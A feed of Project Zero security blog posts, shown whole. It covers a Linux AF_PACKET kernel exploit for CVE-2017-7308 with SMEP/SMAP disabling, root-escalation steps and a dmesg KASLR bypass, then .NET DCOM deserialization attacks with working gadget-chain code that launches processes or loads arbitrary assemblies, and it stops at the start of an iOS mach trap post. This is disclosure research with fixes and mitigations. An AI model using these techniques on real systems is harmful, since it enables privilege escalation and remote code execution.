The state of SMEP & SMAP on the current CPU core is controlled by the 20th and 21st bits of the CR4 register. To disable them we should zero out these two bits. For this we can use the func(data) primitive to call native_write_cr4(X), where X has 20th and 21st bits set to 0. The exact value of X might depend on what other CPU features are enabled. On the machine where I tested the exploit, the value of CR4 is 0x10407f0 (only the SMEP bit is enabled since the CPU has no SMAP support), so I used X = 0x407f0. We can use the sched_setaffinity syscall to force the exploit program to be executed on one CPU core and thus making sure that the userspace payload will be executed on the same core as where we disable SMAP & SMEP.
Putting this all together, here are the exploitation steps:
  1. Figure out the kernel text address to bypass KASLR (described below).
  2. Pad heap as described above.
  3. Disable SMEP & SMAP.
    1. Allocate a packet_sock after a ring buffer block.
    2. Schedule a block retire timer on the packet_sock by attaching a receive ring buffer to it.
    3. Overflow the block and overwrite retire_blk_timer field. Make retire_blk_timer->func point to native_write_cr4 and make retire_blk_timer->data equal to the desired CR4 value.
    4. Wait for the timer to be executed, now we have SMEP & SMAP disabled on the current core.
  4. Get root privileges.
    1. Allocate another pair of a packet_sock and a ring buffer block.
    2. Overflow the block and overwrite xmit field. Make xmit point to a commit_creds(prepare_kernel_cred(0)) allocated in userspace.
    3. Send a packet on the corresponding packet socket, xmit will get triggered and the current process will obtain root privileges.

The exploit code can be found here.
It should be noted, that when we overwrite these two fields in the packet_sock structs, we’ll end up corrupting some of the fields before them (the kernel will write some values to the block and frame headers), which can lead to a kernel crash. However, as long as these other fields don’t get used by the kernel we should be good. I found that one of the fields that caused crashes if we try to close all packet sockets after the exploit finished is the mclist field, but simply zeroing it out helps.

KASLR bypass
I didn’t bother to come up with some elaborate KASLR bypass technique which exploits the same bug. Since Ubuntu doesn’t restrict dmesg by default, we can just grep the kernel syslog for the “Freeing SMP” string, which contains a kernel pointer, that looks suspiciously similar to the kernel text address:
# Boot #1$ dmesg | grep 'Freeing SMP'[    0.012520] Freeing SMP alternatives memory: 32K (ffffffffa58ee000 - ffffffffa58f6000)$ sudo cat /proc/kallsyms | grep 'T _text'ffffffffa4800000 T _text
# Boot #2$ dmesg | grep 'Freeing SMP'[    0.017487] Freeing SMP alternatives memory: 32K (ffffffff85aee000 - ffffffff85af6000)$ sudo cat /proc/kallsyms | grep 'T _text'ffffffff84a00000 T _text
By doing simple math we can calculate the kernel text address based on the one exposed through dmesg. This way of figuring out the kernel text location works only for some time after boot, as syslog only stores a fixed number of lines and starts dropping them at some point.
There are a few Linux kernel hardening features that can be used to prevent this kind of information disclosures. The first one is called dmesg_restrict and it restricts the ability of unprivileged users to read the kernel syslog. It should be noted, that even with dmesg restricted the first user on Ubuntu can still read the syslog from /var/log/kern.log and /var/log/syslog since he belongs to the adm group.
Another feature is called kptr_restrict and it doesn’t allow unprivileged users to see pointers printed by the kernel with the %pK format specifier. However in 4.8 the free_reserved_area() function uses %p, so kptr_restrict doesn’t help in this case. In 4.10 free_reserved_area() was fixed not to print address ranges at all, but the change was not backported to older kernels.
Fix
Let’s take a look at the fix. The vulnerable code as it was before the fix is below. Remember that the user fully controls both tp_block_size and tp_sizeof_priv.
4207                 if (po->tp_version >= TPACKET_V3 &&4208                     (int)(req->tp_block_size -4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)4210                         goto out;
When thinking about a way to fix this, the first idea that comes to mind is that we can compare the two values as is without that weird conversion to int:
4207                 if (po->tp_version >= TPACKET_V3 &&4208                     req->tp_block_size <=4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv))4210                         goto out;
Funny enough, this doesn’t actually help. The reason is that an overflow can happen while evaluating BLK_PLUS_PRIV in case tp_sizeof_priv is close to the unsigned int maximum value.
177 #define BLK_PLUS_PRIV(sz_of_priv) \178         (BLK_HDR_LEN + ALIGN((sz_of_priv), V3_ALIGNMENT))
One of the ways to fix this overflow is to cast tp_sizeof_priv to uint64 before passing it to BLK_PLUS_PRIV. That’s exactly what I did in the fix that was sent upstream.
4207                 if (po->tp_version >= TPACKET_V3 &&4208                     req->tp_block_size <=4209                           BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv))4210                         goto out;Mitigation
Creating packet socket requires the CAP_NET_RAW privilege, which can be acquired by an unprivileged user inside a user namespaces. Unprivileged user namespaces expose a huge kernel attack surface, which resulted in quite a few exploitable vulnerabilities (CVE-2017-7184, CVE-2016-8655, ...). This kind of kernel vulnerabilities can be mitigated by completely disabling user namespaces or disallowing using them to unprivileged users.
To disable user namespaces completely you can rebuild your kernel with CONFIG_USER_NS disabled. Restricting user namespaces usage only to privileged users can be done by writing 0 to /proc/sys/kernel/unprivileged_userns_clone in Debian-based kernel. Since version 4.9 the upstream kernel has a similar /proc/sys/user/max_user_namespaces setting.Conclusion
Right now the Linux kernel has a huge number of poorly tested (from a security standpoint) interfaces and a lot of them are enabled and exposed to unprivileged users in popular Linux distributions like Ubuntu. This is obviously not good and they need to be tested or restricted.
Syzkaller is an amazing tool that allows to test kernel interfaces via fuzzing. Even adding barebone descriptions for another syscall usually uncovers numbers of bugs. We certainly need people writing syscall descriptions and fixing existing ones, since there’s a huge surface that’s still not covered and probably a ton of security bugs buried in the kernel. If you decide to contribute, we’ll be glad to see a pull request.Links
Just a bunch of related links.
Exploit: https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308Fix: https://github.com/torvalds/linux/commit/2b6867c2ce76c596676bec7d2d525af525fdc6e2CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7308
Our Linux kernel bug finding tools:
A collection of Linux kernel exploitation materials: https://github.com/xairy/linux-kernel-exploitation
Categories: Security

Exploiting .NET Managed DCOM

Fri, 04/28/2017 - 12:23
Posted by James Forshaw, Project Zero
One of the more interesting classes of security vulnerabilities are those affecting interoperability technology. This is because these vulnerabilities typically affect any application using the technology, regardless of what the application actually does. Also in many cases they’re difficult for a developer to mitigate outside of not using that technology, something which isn’t always possible.
I discovered one such vulnerability class in the Component Object Model (COM) interoperability layers of .NET which make the use of .NET for Distributed COM (DCOM) across privilege boundaries inherently insecure. This blog post will describe a couple of ways this could be abused, first to gain elevated privileges and then as a remote code execution vulnerability. A Little Bit of Background KnowledgeIf you look at the history of .NET many of its early underpinnings was trying to make a better version of COM (for a quick history lesson it’s worth watching this short video of Anders Hejlsberg discussing .NET). This led to Microsoft placing a large focus on ensuring that while .NET itself might not be COM it must be able to interoperate with COM. Therefore .NET can both be used to implement as well as consume COM objects. For example instead of calling QueryInterface on a COM object you can just cast an object to a COM compatible interface. Implementing an out-of-process COM server in C# is as simple as the following:
// Define COM interface.
[ComVisible(true)]
[InterfaceType(ComInterfaceType.InterfaceIsIDispatch)]
[Guid("3D2392CB-2273-4A76-9C5D-B2C8A3120257")]
public interface ICustomInterface {
   void DoSomething();
}

// Define COM class implementing interface.
[ComVisible(true)]
[Guid("8BC3F05E-D86B-11D0-A075-00C04FB68820")]
public class COMObject : ICustomInterface {
   public void DoSomething() {}
}

// Register COM class with COM services.
RegistrationServices reg = new RegistrationServices();
int cookie = reg.RegisterTypeForComClients(
                 typeof(COMObject),
                 RegistrationClassContext.LocalServer
                   | RegistrationClassContext.RemoteServer,
                 RegistrationConnectionType.MultipleUse);
A client can now connect to the COM server using it’s CLSID (defined by the Guid attribute on COMClass). This is in fact so simple to do that a large number of core classes in .NET are marked as COM visible and registered for use by any COM client even those not written in .NET.

To make this all work the .NET runtime hides a large amount of boilerplate from the developer. There are a couple of mechanisms to influence this boilerplate interoperability code, such as the InterfaceType attribute which defines whether the COM interface is derived from IUnknown or IDispatch but for the most part you get what you’re given.
One thing developers perhaps don’t realize is that it’s not just the interfaces you specify which get exported from the .NET COM object but the runtime adds a number of “management” interfaces as well. This interfaces are implemented by wrapping the .NET object inside a COM Callable Wrapper (CCW).
We can enumerate what interfaces are exposed by the CCW. Taking System.Object as an example the following table shows what interfaces are supported along with how each interface is implemented, either dynamically at runtime or statically implemented inside the runtime.
Interface NameImplementation Type_ObjectDynamicIConnectionPointContainerStaticIDispatchDynamicIManagedObjectStaticIMarshalStaticIProvideClassInfoStaticISupportErrorInfoStaticIUnknownDynamic
The _Object interface refers to the COM visible representation of the System.Object class which is the root of all .NET objects, it must be generated dynamically as it’s dependent on the .NET object being exposed. On the other hand IManagedObject is implemented by the runtime itself and the implementation is shared across all CCWs.
I started looking at the exposed COM attack surface for .NET back in 2013 when I was investigating Internet Explorer sandbox escapes. One of the COM objects you could access outside the sandbox was the .NET ClickOnce Deployment broker (DFSVC) which turned out to be implemented in .NET, which is probably not too surprising. I actually found two issues, not in DFSVC itself but instead in the _Object interface exposed by all .NET COM objects. The _Object interface looks like the following (in C++).
struct _Object : public IDispatch {
 HRESULT ToString(BSTR * pRetVal);
 HRESULT Equals(VARIANT obj, VARIANT_BOOL *pRetVal);
 HRESULT GetHashCode(long *pRetVal);
 HRESULT GetType(_Type** pRetVal);
};
The first bug (which resulted in CVE-2014-0257) was in the GetType method. This method returns a COM object which can be used to access the .NET reflection APIs. As the returned _Type COM object was running inside the server you could call a chain of methods which resulted in getting access to the Process.Start method which you could call to escape the sandbox. If you want more details about that you can look at the PoC I wrote and put up on Github. Microsoft fixed this by preventing the access to the reflection APIs over DCOM.
The second issue was more subtle and is a byproduct of a feature of .NET interop which presumably no-one realized would be a security liability. Loading the .NET runtime requires quite a lot of additional resources, therefore the default for a native COM client calling methods on a .NET COM server is to let COM and the CCW manage the communication, even if this is a performance hit. Microsoft could have chosen to use the COM marshaler to force .NET to be loaded in the client but this seems overzealous, not even counting the possibility that the client might not even have a compatible version of .NET installed.
When .NET interops with a COM object it creates the inverse of the CCW, the Runtime Callable Wrapper (RCW). This is a .NET object which implements a runtime version of the COM interface and marshals it to the COM object. Now it’s entirely possible that the COM object is actually written in .NET, it might even be in the same Application Domain. If .NET didn’t do something you could end up with a double performance hit, marshaling in the RCW to call a COM object which is actually a CCW to a managed object.


It would be nice to try and “unwrap” the managed object from the CCW and get back a real .NET object. This is where the villain in this piece comes into play, the IManagedObject interface, which looks like the following:
struct IManagedObject : public IUnknown {
 HRESULT GetObjectIdentity(
   BSTR*   pBSTRGUID,  
   int*    AppDomainID,  
   int*    pCCW);
   
 HRESULT GetSerializedBuffer(
   BSTR *pBSTR  
 );
};
When the .NET runtime gets hold of a COM object it will go through a process to determine whether it can “unwrap” the object from its CCW and avoid creating an RCW. This process is documented but in summary the runtime will do the following:
  1. Call QueryInterface on the COM object to determine if it implements the IManagedObject interface. If not then return an appropriate RCW.
  2. Call GetObjectIdentity on the interface. If the GUID matches the per-runtime GUID (generated at runtime startup) and the AppDomain ID matches the current AppDomain ID then lookup the CCW value in a runtime table and extract a pointer to the real managed object and return it.
  3. Call GetSerializedBuffer on the interface. The runtime will check if the .NET object is serializable, if so it will pass the object to BinaryFormatter::Serialize and package the result in a Binary String (BSTR). This will be returned to the client which will now attempt to deserialize the buffer to an object instance by calling BinaryFormatter::Deserialize.

Both steps 2 and 3 sound like a bad idea. For example while in 2 the per-runtime GUID can’t be guessed; if you have access to any other object in the same process (such as the COM object exposed by the server itself) you can call GetObjectIdentity on the object and replay the GUID and AppDomain ID back to the server. This doesn’t really gain you much though, the CCW value is just a number not a pointer so at best you’ll be able to extract objects which already have a CCW in place.
Instead it’s step 3 which is really nasty. Arbitrary deserialization is dangerous almost no matter what language (take your pick, Java, PHP, Ruby etc.) and .NET is no different. In fact my first ever Blackhat USA presentation (whitepaper) was on this very topic and there’s been follow up work since (such as this blog post). Clearly this is an issue we can exploit, first let’s look at it from the perspective of privilege escalation.Elevating PrivilegesHow can we get a COM server written in .NET to do the arbitrary deserialization? We need the server to try and create an RCW for a serializable .NET object exposed over COM. It would be nice if this could also been done generically; it just so happens that on the standard _Object interface there exists a function we can pass an arbitrary object to, the Equals method. The purpose of Equals is to compare two objects for equality. If we pass a .NET COM object to the server’s Equals method the runtime must try and convert it to an RCW so that the managed implementation can use it. At this point the runtime wants to be helpful and checks if it’s really a CCW wrapped .NET object. The server runtime calls GetSerializedBuffer which results in arbitrary deserialization in the server process.
This is how I exploited the ClickOnce Deployment broker a second time resulting in  CVE-2014-4073. The trick to exploiting this was to send a serialized Hashtable to the server which contains a COM implementation of the IHashCodeProvider interface. When the Hashtable runs its custom deserialization code it needs to rebuild its internal hash structures, it does that by calling IHashCodeProvider::GetHashCode on each key. By adding a Delegate object, which is serializable, as one of the keys we’ll get it passed back to the client. By writing the client in native code the automatic serialization through IManagedObject won’t occur when passing the delegate back to us. The delegate object gets stuck inside the server process but the CCW is exposed to us which we can call. Invoking the delegate results in the specified function being executed in the server context which allows us to start a new process with the server’s privileges. As this works generically I even wrote a tool to do it for any .NET COM server which you can find on github.

Microsoft could have fixed CVE-2014-4073 by changing the behavior of IManagedObject::GetSerializedBuffer but they didn’t. Instead Microsoft rewrote the broker in native code instead. Also a blog post was published warning developers of the dangers of .NET DCOM. However what they didn’t do is deprecate any of the APIs to register DCOM objects in .NET so unless a developer is particularly security savvy and happens to read a Microsoft security blog they probably don’t realize it’s a problem.
This bug class exists to this day, for example when I recently received a new work laptop I did what I always do, enumerate what OEM “value add” software has been installed and see if anything was exploitable. It turns out that as part of the audio driver package was installed a COM service written by Dolby. After a couple of minutes of inspection, basically enumerating accessible interface for the COM server, I discovered it was written in .NET (the presence of IManagedObject is always a big giveaway). I cracked out my exploitation tool and in less than 5 minutes I had code execution at local system. This has now been fixed as CVE-2017-7293, you can find the very terse writeup here. Once again as .NET DCOM is fundamentally unsafe the only thing Dolby could do was rewrite the service in native code.Hacking the CallerFinding a new instance of the IManagedObject bug class focussed my mind on its other implications. The first thing to stress is the server itself isn’t vulnerable, instead it’s only when we can force the server to act as a DCOM client calling back to the attacking application that the vulnerability can be exploited. Any .NET application which calls a DCOM object through managed COM interop should have a similar issue, not just servers. Is there likely to be any common use case for DCOM, especially in a modern Enterprise environment?
My immediate thought was Windows Management Instrumentation (WMI). Modern versions of Windows can connect to remote WMI instances using the WS-Management (WSMAN) protocol but for legacy reasons WMI still supports a DCOM transport. One use case for WMI is to scan enterprise machines for potentially malicious behavior. One of the reasons for this resurgence is  Powershell (which is implemented in .NET) having easy to use support for WMI. Perhaps PS or .NET itself will be vulnerable to this attack if they try and access a compromised workstation in the network?

Looking at MSDN, .NET supports WMI through the System.Management namespace. This has existed since the beginning of .NET. It supports remote access to WMI and considering the age of the classes it predates WSMAN and so almost certainly uses DCOM under the hood. On the PS front there’s support for WMI through cmdlets such as Get-WmiObject. PS version 3 (introduced in Windows 8 and Server 2008) added a new set of cmdlets including Get-CimInstance. Reading the related link it’s clear why the CIM cmdlets were introduced, support for WSMAN, and the link explicitly points out that the “old” WMI cmdlets uses DCOM.

At this point we could jump straight into RE of the .NET and PS class libraries, but there’s an easier way. It’s likely we’d be able to see whether the .NET client queries for IManagedObject by observing the DCOM RPC traffic to a WMI server. Wireshark already has a DCOM dissector saving us a lot of trouble. For a test I set up two VMs, one with Windows Server 2016 acting as a domain controller and one with Windows 10 as a client on the domain. Then from a Domain Administrator on the client I issued a simple WMI PS command ‘Get-WmiObject Win32_Process -ComputerName dc.network.local’ while monitoring the network using Wireshark. The following image shows what I observed:

The screenshot shows the initial creation request for the WMI DCOM object on the DC server (192.168.56.50) from the PS client (192.168.56.102). We can see it’s querying for the IWbemLoginClientID interface which is the part of the initialization process (as documented in MS-WMI). The client then tries to request a few other interfaces; notably it asks for IManagedObject. This almost certainly indicates that a client using the PS WMI cmdlets would be vulnerable.
In order to test whether this is really a vulnerability we’ll need a fake WMI server. This would seem like it would be quite a challenge, but all we need to do is modify the registration for the winmgmt service to point to our fake implementation. As long as that service then registers a COM class with the CLSID {8BC3F05E-D86B-11D0-A075-00C04FB68820} the COM activator will start the service and serve any client an instance of our fake WMI object. If we look back at our network capture it turns out that the query for IManagedObject isn’t occurring on the main class, but instead on the IWbemServices object returned from IWbemLevel1Login::NTLMLogin. But that’s okay, it just adds a bit extra boilerplate code. To ensure it’s working we’ll implement the following code which will tell the deserialization code to look for an unknown Assembly called Badgers.
[Serializable, ComVisible(true)]
public class FakeWbemServices :
              IWbemServices,
              ISerializable {
   public void GetObjectData(SerializationInfo info,
                             StreamingContext context) {
       info.AssemblyName = "Badgers, Version=4.0.0.0";
       info.FullTypeName = "System.Badgers.Test";
   }
   
   // Rest of fake implementation...
}
If we successfully injected a serialized stream then we’d expect the PS process to try and lookup a Badgers.dll file and using Process Monitor that’s exactly what we find.
Chaining Up the DeserializerWhen exploiting the deserialization for local privilege escalation we can be sure that we can connect back to the server and run an arbitrary delegate. We don’t have any such guarantees in the RCE case. If the WMI client has default Windows Firewall rules enabled then we almost certainly wouldn’t be able to connect to the RPC endpoint made by the delegate object. We also need to be allowed to login over the network to the machine running the WMI client, our compromised machine might not have a login to the domain or the enterprise policy might block anyone but the owner from logging in to the client machine.
We therefore need a slightly different plan, instead of actively attacking the client through exposing a new delegate object we’ll instead pass it a byte stream which when deserialized executes a desired action. In an ideal world we’d find that one serializable class which just executes arbitrary code for us. Sadly (as far as I know of) no such class exists. So instead we’ll need to find a series of “Gadget” classes which when chained together perform the desired effect.
So in this situation I tend to write some quick analysis tools, .NET supports a pretty good Reflection API so finding basic information such as whether a class is serializable or which interfaces a class supports is pretty easy to do. We also need a list of Assemblies to check, the quickest way I know of is to use the gacutil utility installed as part of the .NET SDK (and so installed with Visual Studio). Run the command gacutil /l > assemblies.txt to create a list of assembly names you can load and process. For a first pass we’ll look for any classes which are serializable and have delegates in them, these might be classes which when an operation is performed will execute arbitrary code. With our list of assemblies we can write some simple code like the following to find those classes, just call FindSerializableTypes for each assembly name string:
static bool IsDelegateType(Type t) {
 return typeof(Delegate).IsAssignableFrom(t);
}

static bool HasSerializedDelegate(Type t) {
 // Custom serialized objects rarely serialize their delegates.
 if (typeof(ISerializable).IsAssignableFrom(t)) {
   return false;
 }

 foreach (FieldInfo field in FormatterServices.GetSerializableMembers(t)) {
   if (IsDelegateType(field.FieldType)) {
     return true;
   }
 }
}

static void FindSerializableTypes(string assembly_name) {
 Assembly asm = Assembly.Load(assembly_name);
 var types = asm.GetTypes().Where(t =>   t.IsSerializable
                                     &&  t.IsClass
                                     && !t.IsAbstract
                                     && !IsDelegateType(t)
                                     &&  HasSerializedDelegate(t));
 foreach (Type type in types) {
   Console.WriteLine(type.FullName);
 }
}
Across my system this analysis only resulted in around 20 classes, and of those many were actually in the F# libraries which are not distributed in a default installation. However one class did catch my eye, System.Collections.Generic.ComparisonComparer<T>. You can find the implementation in the reference source, but as it’s so simple here it is in its entirety:
public delegate int Comparison<T>(T x, T y);
[Serializable]
internal class ComparisonComparer<T> : Comparer<T> {
 private readonly Comparison<T> _comparison;

 public ComparisonComparer(Comparison<T> comparison) {
   _comparison = comparison;
 }

 public override int Compare(T x, T y) {
   return this._comparison(x, y);
 }
}
This class wraps a Comparison<T> delegate which takes two generic parameters (of the same type) and returns an integer, calling the delegate to implement the IComparer<T> interface. While the class is internal its creation is exposed through Comparer<T>::Create static method. This is the first part of the chain, with this class and a bit of massaging of serialized delegates we can chain IComparer<T>::Compare to Process::Start and get an arbitrary process created. Now we need the next part of the chain, calling this comparer object with arbitrary arguments.
Comparer objects are used a lot in the generic .NET collection classes and many of these collection classes also have custom deserialization code. In this case we can abuse the SortedSet<T> class, on deserialization it rebuilds its set using an internal comparer object to determine the sort order. The values passed to the comparer are the entries in the set, which is under our complete control.  Let’s write some test code to check it works as we expect:
static void TypeConfuseDelegate(Comparison<string> comp) {
   FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList",
           BindingFlags.NonPublic | BindingFlags.Instance);
   object[] invoke_list = comp.GetInvocationList();
   // Modify the invocation list to add Process::Start(string, string)
   invoke_list[1] = new Func<string, string, Process>(Process.Start);
   fi.SetValue(comp, invoke_list);
}

// Create a simple multicast delegate.
Delegate d = new Comparison<string>(String.Compare);
Comparison<string> d = (Comparison<string>) MulticastDelegate.Combine(d, d);
// Create set with original comparer.
IComparer<string> comp = Comparer<string>.Create(d);
SortedSet<string> set = new SortedSet<string>(comp);

// Setup values to call calc.exe with a dummy argument.
set.Add("calc");
set.Add("adummy");

TypeConfuseDelegate(d);

// Test serialization.
BinaryFormatter fmt = new BinaryFormatter();
MemoryStream stm = new MemoryStream();
fmt.Serialize(stm, set);
stm.Position = 0;
fmt.Deserialize(stm);// Calculator should execute during Deserialize.
The only weird thing about this code is TypeConfuseDelegate. It’s a long standing issue that .NET delegates don’t always enforce their type signature, especially the return value. In this case we create a two entry multicast delegate (a delegate which will run multiple single delegates sequentially), setting one delegate to String::Compare which returns an int, and another to Process::Start which returns an instance of the Process class. This works, even when deserialized and invokes the two separate methods. It will then return the created process object as an integer, which just means it will return the pointer to the instance of the process object. So we end up with chain which looks like the following:

While this is a pretty simple chain it has a couple of problems which makes it less than ideal for our use:
  1. The Comparer<T>::Create method and the corresponding class were only introduced in .NET 4.5, which covers Windows 8 and above but not Windows 7.
  2. The exploit relies in part on a type confusion of the return value of the delegate. While it’s only converting the Process object to an integer this is somewhat less than ideal and could have unexpected side effects.
  3. Starting a process is a bit on the noisy side, it would be nicer to load our code from memory.

So we’ll need to find something better. We want something which works at a minimum on .NET 3.5, which would be the version on Windows 7 which Windows Update would automatically update you to. Also it shouldn’t rely on undefined behaviour or loading our code from outside of the DCOM channel such as over a HTTP connection. Sounds like a challenge to me.Improving the ChainWhile looking at some of the other classes which are serializable I noticed a few in the System.Workflow.ComponentModel.Serialization namespace. This namespace contains classes which are part of the Windows Workflow Foundation, which is a set of libraries to build execution pipelines to perform a series of tasks. This alone sounds interesting, and it turns out I have exploited the core functionality before as a bypass for Code Integrity in Windows Powershell.
This lead me to finding the ObjectSerializedRef class. This looks very much like a class which will deserialize any object type, not just serialized ones. If this was the case then that would be a very powerful primitive for building a more functional deserialization chain.
[Serializable]
private sealed class ObjectSerializedRef : IObjectReference,                                           IDeserializationCallback
{
 private Type type;
 private object[] memberDatas;

 [NonSerialized]
 private object returnedObject;

 object IObjectReference.GetRealObject(StreamingContext context) {
   returnedObject = FormatterServices.GetUninitializedObject(type);
   return this.returnedObject;
 }

 void IDeserializationCallback.OnDeserialization(object sender) {
   string[] array = null;
   MemberInfo[] serializableMembers =
      FormatterServicesNoSerializableCheck.GetSerializableMembers(           type, out array);
   FormatterServices.PopulateObjectMembers(returnedObject,                            serializableMembers, memberDatas);
 }
}
Looking at the implementation the class was used as a serialization surrogate exposed through the ActivitiySurrogateSelector class. This is a feature of the .NET serialization API, you can specify a “Surrogate Selector” during the serialization process which will replace an object with surrogate class. When the stream is deserialized this surrogate class contains enough information to reconstruct the original object. One use case is to handle the serialization of non-serializable classes, but ObjectSerializedRef goes beyond a specific use case and allows you to deserialize anything. A test was in order:
// Definitely non-serializable class.
class NonSerializable {
 private string _text;

 public NonSerializable(string text) {
   _text = text;
 }

 public override string ToString() {
   return _text;
 }
}

// Custom serialization surrogate
class MySurrogateSelector : SurrogateSelector {
 public override ISerializationSurrogate GetSurrogate(Type type,
     StreamingContext context, out ISurrogateSelector selector) {
   selector = this;
   if (!type.IsSerializable) {
     Type t = Type.GetType("ActivitySurrogateSelector+ObjectSurrogate");
     return (ISerializationSurrogate)Activator.CreateInstance(t);
   }

   return base.GetSurrogate(type, context, out selector);
 }
}

static void TestObjectSerializedRef() {
   BinaryFormatter fmt = new BinaryFormatter();
   MemoryStream stm = new MemoryStream();
   fmt.SurrogateSelector = new MySurrogateSelector();
   fmt.Serialize(stm, new NonSerializable("Hello World!"));
   stm.Position = 0;

   // Should print Hello World!.
   Console.WriteLine(fmt.Deserialize(stm));
}
The ObjectSurrogate class seems to work almost too well. This class totally destroys any hope of securing an untrusted BinaryFormatter stream and it’s available from .NET 3.0. Any class which didn’t mark itself as serializable is now a target. It’s going to be pretty easy to find a class which while invoke an arbitrary delegate during deserialization as the developer will not be doing anything to guard against such an attack vector.
Now just to choose a target to build out our deserialization chain. I could have chosen to poke further at the Workflow classes, but the API is horrible (in fact in .NET 4 Microsoft replaced the old APIs with a new, slightly nicer one). Instead I’ll pick a really easy to use target, Language Integrated Query (LINQ).
LINQ was introduced in .NET 3.5 as a core language feature. A new SQL-like syntax was introduced to the C# and VB compilers to perform queries across enumerable objects, such as Lists or Dictionaries. An example of the syntax which filters a list of names based on length and returns the list uppercased is as follows:
string[] names = { "Alice", "Bob", "Carl" };

IEnumerable<string> query = from name in names
                           where name.Length > 3
                           orderby name
                           select name.ToUpper();

foreach (string item in query) {
   Console.WriteLine(item);
}
You can also view LINQ not as a query syntax but instead a way of doing list comprehension in .NET. If you think of ‘select’ as equivalent to ‘map’ and ‘where’ to ‘filter’ it might make more sense. Underneath the query syntax is a series of methods implemented in the System.Linq.Enumerable class. You can write it using normal C# syntax instead of the query language; if you do the previous example becomes the following:
IEnumerable<string> query = names.Where(name => name.Length > 3)
                                .OrderBy(name => name)
                                .Select(name => name.ToUpper());
The methods such as Where take two parameters, a list object (this is hidden in the above example) and a delegate to invoke for each entry in the enumerable list. The delegate is typically provided by the application, however there’s nothing to stop you replacing the delegates with system methods. The important thing to bear in mind is that the delegates are not invoked until the list is enumerated. This means we can build an enumerable list using LINQ methods, serialize it using the ObjectSurrogate (LINQ classes are not themselves serializable) then if we can force the deserialized list to be enumerated it will execute arbitrary code.
Using LINQ as a primitive we can create a list which when enumerated maps a byte array to an instance of a type in that byte array by the following sequence:
The only tricky part is step 2, we’d like to extract a specific type but our only real option is to use the Enumerable.Join method which requires some weird kludges to get it to work. A better option would have been to use Enumerable.Zip but that was only introduced in .NET 4. So instead we’ll just get all the types in the loaded assembly and create them all, if we just have one type then this isn’t going to make any difference. How does the implementation look in C#?
static IEnumerable CreateLinq(byte[] assembly) {
 List<byte[]> base_list = new List<byte[]>();
 base_list.Add(assembly);
 
 var get_types_del = (Func<Assembly, IEnumerable<Type>>)                         Delegate.CreateDelegate(
                          typeof(Func<Assembly, IEnumerable<Type>>),
                          typeof(Assembly).GetMethod("GetTypes"));

 return base_list.Select(Assembly.Load)
                 .SelectMany(get_types_del)
                 .Select(Activator.CreateInstance);
}
The only non-obvious part of the C# implementation is the delegate for Assembly::GetTypes. What we need is a delegate which takes an Assembly object and returns a list of Type objects. However as GetTypes is an instance method the default would be to capture the Assembly class and store it inside the delegate object, which would result in a delegate which took no parameters and returned a list of Type. We can get around this by using the reflection APIs to create an open delegate to an instance member. An open delegate doesn’t store the object instance, instead it exposes it as an additional Assembly parameter, exactly what we want.
With our enumerable list we can get the assembly loaded and our own code executed, but how do we get the list enumerated to start the chain? For this decided I’d try and find a class which when calling ToString (a pretty common method) would enumerate the list. This is easy in Java, almost all the collection classes have this exact behavior. Sadly it seems .NET doesn't follow Java in this respect. So I modified my analysis tools to try and hunt for gadgets which would get us there. To cut a long story short I found a chain from ToString to IEnumerable through three separate classes. The chain looks something like the following:
Are we done yet? No, just one more step, we need to call ToString on an arbitrary object during deserialization. Of course I wouldn’t have chosen ToString if I didn’t already have a method to do this. In this final case I’ll go back to abusing poor, old, Hashtable. During deserialization of the Hashtable class it will rebuild its key set, which we already know about as this is how I exploited serialization for local EoP. If two keys are equal then the deserialization will fail with the Hashtable throwing an exception, resulting in running the following code:
throw new ArgumentException(
           Environment.GetResourceString("Argument_AddingDuplicate__",
                                   buckets[bucketNumber].key, key));
It’s not immediately obvious why this would be useful. But perhaps looking at the implementation of GetResourceString will make it clearer:
internal static String GetResourceString(String key, params Object[] values) {
   String s = GetResourceString(key);
   return String.Format(CultureInfo.CurrentCulture, s, values);
}
The key is passed to GetResourceString within the values array as well as a reference to a resource string. The resource string is looked up and along with the key passed to String.Format. The resulting resource string has formatting codes so when String.Format encounters the non-string value it calls ToString on the object to format it. This results in ToString being called during deserialization kicking off the chain of events which leads to us loading an arbitrary .NET assembly from memory and executing code in the context of the WMI client.
You can see the final implementation in latest the PoC I’ve added to the issue tracker.ConclusionsMicrosoft fixed the RCE issue by ensuring that the System.Management classes never directly creates an RCW for a WMI object. However this fix doesn’t affect any other use of DCOM in .NET, so privileged .NET DCOM servers are still vulnerable and other remote DCOM applications could also be attacked.
Also this should be a lesson to never deserialize untrusted data using the .NET BinaryFormatter class. It’s a dangerous thing to do at the best of times, but it seems that the developers have abandoned any hope of making secure serializable classes. The presence of ObjectSurrogate effectively means that every class in the runtime is serializable, whether the original developer wanted them to be or not.
And as a final thought you should always be skeptical about the security implementation of middleware especially if you can’t inspect what it does. The fact that the issue with IManagedObject is designed in and hard to remove makes it very difficult to fix correctly.
Categories: Security

Exception-oriented exploitation on iOS

Tue, 04/18/2017 - 12:06
Posted by Ian Beer, Project Zero
This post covers the discovery and exploitation of CVE-2017-2370, a heap buffer overflow in the mach_voucher_extract_attr_recipe_trap mach trap. It covers the bug, the development of an exploitation technique which involves repeatedly and deliberately crashing and how to build live kernel introspection features using old kernel exploits.
It’s a trap!Alongside a large number of BSD syscalls (like ioctl, mmap, execve and so on) XNU also has a small number of extra syscalls supporting the MACH side of the kernel called mach traps. Mach trap syscall numbers start at 0x1000000. Here’s a snippet from the syscall_sw.c file where the trap table is defined:
/* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll),/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL),/* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww),
Most of the mach traps are fast-paths for kernel APIs that are also exposed via the standard MACH MIG kernel apis. For example mach_vm_allocate is also a MIG RPC which can be called on a task port.
Mach traps provide a faster interface to these kernel functions by avoiding the serialization and deserialization overheads involved in calling kernel MIG APIs. But without that autogenerated code complex mach traps often have to do lots of manual argument parsing which is tricky to get right.
In iOS 10 a new entry appeared in the mach_traps table:
/* 72 */ MACH_TRAP(mach_voucher_extract_attr_recipe_trap, 4, 4, munge_wwww),
